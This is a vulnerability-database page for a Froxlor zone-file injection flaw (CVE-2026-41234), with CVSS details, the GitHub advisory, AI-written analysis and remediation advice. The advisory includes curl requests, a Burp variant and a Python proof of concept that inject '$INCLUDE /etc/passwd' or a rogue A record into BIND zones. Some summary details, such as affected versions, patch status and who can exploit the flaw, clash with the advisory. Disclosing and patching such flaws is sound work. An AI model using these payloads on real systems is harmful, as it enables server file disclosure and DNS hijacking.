What is the CVSS score of EUVD-2026-34313?

EUVD-2026-34313 has a CVSS 3.1 base score of 7.6 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L. EPSS exploitation probability: 0.0%.

Which versions of Froxlor are affected by EUVD-2026-34313?

Froxlor DNS control panel versions 2.3.6 and earlier allow authenticated administrators with DNS editing privileges to inject unauthorized DNS records and directives, with publicly available…. A patch is available.

How to fix or mitigate EUVD-2026-34313?

Within 24 hours: Inventory all Froxlor deployments running version 2.3.6 or earlier; review which customer/admin accounts have DNS editing permissions; immediately disable DNS editing for non-essential accounts and restrict to trusted administrators. Within 7 days: Audit zone-file modification logs for suspicious DomainZones.add API activity; implement alerting on all zone-file changes; restrict network-level access to Froxlor's DNS APIs if operationally feasible. Within 30 days: Prepare upgrade to Froxlor version 2.3.7 or later when released; validate in non-production environment; schedule and execute upgrade with appropriate change control.

Froxlor EUVD-2026-34313

| CVE-2026-41234 HIGH

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)

2026-06-03 https://github.com/froxlor/froxlor

GHSA-37m5-m4q3-fc6x

Python Apache PHP Information Disclosure Docker Debian

7.6

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

7.6 HIGH

AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

High

Availability

Low

Lifecycle Timeline

Source Code Evidence Fetched

Jun 03, 2026 - 21:49 vuln.today

Analysis Generated

Jun 03, 2026 - 21:49 vuln.today

CVE Published

Jun 03, 2026 - 21:02 nvd

HIGH 7.6

DescriptionGitHub Advisory

Summary

The DomainZones.add API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives ($INCLUDE, $GENERATE) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.

This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records.

Affected Code

lib/Froxlor/Api/Commands/DomainZones.php, lines 306-308:

php

} elseif ($type == 'TXT' && !empty($content)) {
    // check that TXT content is enclosed in " "
    $content = Dns::encloseTXTContent($content);
}

Dns::encloseTXTContent() (lib/Froxlor/Dns/Dns.php:571-592) only adds or removes surrounding quote characters. It does not strip newlines, carriage returns, or any BIND zone metacharacters.

Line 148 of DomainZones.php still contains:

php

// TODO regex validate content for invalid characters

The content flows to the zone file via DnsEntry::__toString() (lib/Froxlor/Dns/DnsEntry.php:83), which concatenates $this->content directly into the zone line followed by PHP_EOL. Embedded newlines in the content produce additional lines in the zone file output.

Comparison with CVE-2026-30932 fix

The v2.3.5 fix for CVE-2026-30932 added validation functions for these types:

Type	Validation Added	Still Vulnerable?
LOC	`Validate::validateDnsLoc()` (strict regex)	No
RP	`Validate::validateDnsRp()` (domain validation)	No
SSHFP	`Validate::validateDnsSshfp()` (3-part split)	No
TLSA	`Validate::validateDnsTlsa()` (4-part split)	No
TXT	`Dns::encloseTXTContent()` (quotes only)	Yes

PoC

Environment

Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
DNS enabled (system.bind_enable=1, system.dnsenabled=1)
Customer with dnsenabled=1, domain with isbinddomain=1
Customer has an API key (or uses the web UI DNS editor with Burp)

Reproduction via API

bash

# Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "@",
      "content": "v=spf1 +all\"\n$INCLUDE /etc/passwd",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

Reproduction via Web UI (Burp)

Log in as a customer with DNS editing enabled
Navigate to Resources > Domains > (domain) > DNS Editor
Add a new record: Type = TXT, Record = @, Content = any
Intercept the POST request in Burp Suite
Change the dns_content parameter to: v=spf1 +all"%0a$INCLUDE /etc/passwd

(%0a is URL-encoded newline)

Forward the request

Result

The API returns the generated zone content. The TXT record line is split at the newline, and $INCLUDE /etc/passwd appears on its own line as a BIND directive:

$TTL 604800
$ORIGIN testdomain.lab.
@   604800  IN  SOA  froxlor.lab admin.froxlor.lab. 2026041004 ...
@   18000   IN  TXT  "v=spf1 +all"
$INCLUDE /etc/passwd"
@   604800  IN  A    100.95.188.127
*   604800  IN  A    100.95.188.127

When the DNS rebuild cron runs, BIND processes the $INCLUDE directive and attempts to read /etc/passwd.

Variant: Arbitrary DNS record injection

The same technique injects arbitrary A/MX/CNAME records:

bash

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{
    "command": "DomainZones.add",
    "params": {
      "domainname": "testdomain.lab",
      "type": "TXT",
      "record": "_spf",
      "content": "v=spf1 +all\"\nevil\t18000\tIN\tA\t6.6.6.6",
      "ttl": 18000
    }
  }' \
  https://panel.example.com/api.php

Result:

_spf   18000  IN  TXT  "v=spf1 +all"
evil   18000  IN  A    6.6.6.6

evil.testdomain.lab now resolves to attacker IP 6.6.6.6.

Automated PoC Script

python

#!/usr/bin/env python3
"""Froxlor <= 2.3.5 TXT Zone Injection - Incomplete CVE-2026-30932 Fix"""
import json, sys, requests, urllib3
urllib3.disable_warnings()

def api(target, key, secret, cmd, params=None):
    return requests.post(f"{target.rstrip('/')}/api.php",
        auth=(key, secret), json={"command": cmd, "params": params or {}},
        verify=False).json()

target, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
# Inject $INCLUDE
r = api(target, key, secret, "DomainZones.add", {
    "domainname": domain, "type": "TXT", "record": "@",
    "content": 'v=spf1 +all"\n$INCLUDE /etc/passwd', "ttl": 18000})

for line in r.get("data", []):
    tag = "   <-- INJECTED" if "$INCLUDE" in str(line) else ""
    if line: print(f"  {line}{tag}")

print("\nCONFIRMED" if any("$INCLUDE" in str(l) for l in r.get("data",[])) else "FAILED")

Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET domain.tld

Impact

Information Disclosure: $INCLUDE directs BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer via DomainZones.listing or DNS queries to records created from parsed file lines.
DNS Record Injection: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.
DNS Service Disruption: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain. $GENERATE directives can create massive record sets for amplification.

Suggested Fix

Strip newlines and BIND metacharacters from TXT content. Minimal fix:

php

// lib/Froxlor/Api/Commands/DomainZones.php, around line 306
} elseif ($type == 'TXT' && !empty($content)) {
    // Strip characters that can break zone file format
    $content = str_replace(["\n", "\r", "\t"], '', $content);
    $content = Dns::encloseTXTContent($content);
}

A more comprehensive fix would add a validation function (similar to validateDnsLoc, validateDnsSshfp, etc.) that rejects any content containing zone metacharacters ($, newlines), and remove the TODO at line 148.

AnalysisAI

Authenticated zone-file injection in Froxlor <=2.3.6 allows a customer with DNS editing enabled to inject newline characters into TXT record content via the DomainZones.add API, breaking out of the record line in the generated BIND zone file and injecting arbitrary BIND directives ($INCLUDE, $GENERATE) or DNS records (A, MX, CNAME). The flaw is an incomplete fix for CVE-2026-30932, which sanitized LOC/RP/SSHFP/TLSA records but left TXT handling reliant only on Dns::encloseTXTContent(), which strips no control characters. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Obtain customer account with DNS editing

Delivery

Identify BIND-enabled domain

Exploit

Submit DomainZones.add TXT with embedded newline + $INCLUDE

Execution

Wait for DNS rebuild cron to write zone

Persist

BIND parses injected directive on reload

Impact

Read server files via listing or hijack subdomain DNS

Access

Obtain customer account with DNS editing

Delivery

Identify BIND-enabled domain

Exploit

Submit DomainZones.add TXT with embedded newline + $INCLUDE

Execution

Wait for DNS rebuild cron to write zone

Persist

BIND parses injected directive on reload

Impact

Read server files via listing or hijack subdomain DNS

Vulnerability AssessmentAI

Exploitation	Exploitation requires (1) an authenticated Froxlor customer account whose `dnsenabled` flag is set to 1, (2) at least one domain on that account with `isbinddomain=1`, (3) the global Froxlor settings `system.bind_enable=1` and `system.dnsenabled=1` so the BIND zone-rebuild cron actually consumes the tampered content, and (4) network reach to /api.php with an API key/secret or to the web UI DNS editor. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	CVSS 7.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L) accurately reflects the trade-offs: network reachable, low complexity, no user interaction, but requiring low-privilege authentication (a customer account with DNS editing enabled and a domain flagged isbinddomain=1). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker registers (or compromises) a low-privileged customer account on a shared Froxlor host, ensures they own a domain with BIND DNS enabled, and submits a DomainZones.add API call (or an intercepted web-UI POST) with a TXT record whose content embeds `\n$INCLUDE /etc/passwd` or `\nevil 18000 IN A 6.6.6.6`. When the DNS rebuild cron next regenerates zone files, BIND parses the injected directive - either reading a server-side file and exposing its contents back through DomainZones.listing/DNS queries, or publishing attacker-controlled A/MX/CNAME records that enable phishing subdomains, mail interception, or subdomain takeover. …
Remediation	Vendor-released patch: upgrade to Froxlor 2.3.7, which per the release notes at https://github.com/froxlor/froxlor/releases/tag/2.3.7 explicitly 'remove[s] invalid control characters in every dns content-field' (see also advisory GHSA-37m5-m4q3-fc6x). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all Froxlor deployments running version 2.3.6 or earlier; review which customer/admin accounts have DNS editing permissions; immediately disable DNS editing for non-essential accounts and restrict to trusted administrators. …

Threat intelligence, references, and detailed analysis are available after sign-in.